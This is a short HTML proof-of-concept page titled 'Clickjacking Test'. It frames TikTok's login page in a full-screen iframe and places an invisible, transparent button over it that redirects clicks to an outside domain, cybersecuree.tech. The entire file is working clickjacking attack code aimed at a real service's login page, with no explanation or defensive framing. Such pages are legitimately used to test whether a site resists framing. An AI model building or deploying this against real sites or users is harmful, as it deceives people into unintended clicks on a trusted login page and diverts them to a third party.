<!DOCTYPE html>
<html lang="en">
 <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clickjacking Test</title>
    <style>
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            border: none; 
            z-index: 1; 
        }
        
        .redirect-button {
            position: absolute;
            top: 50%; 
            left: 50%; 
            transform: translate(-50%, -50%);
            z-index: 2; 
            padding: 15px; 
            background-color: rgba(255, 255, 255, 0); /* Fully transparent background */
            color: rgba(255, 255, 255, 0); /* Fully transparent text */
            border: none;
            cursor: pointer;
            width: 27%; 
            text-align: center;
        }
       
        .redirect-button:hover {
            background-color: rgba(255, 255, 255, 0.2); /* Light white hover effect */
        }
    </style>
</head>
<body>
    
    <button class="redirect-button" onclick="window.location.href='https://www.cybersecuree.tech';">Click Me</button>
    <iframe src="https://www.tiktok.com/login/phone-or-email" title="Target Website"></iframe>
</body>
</html>
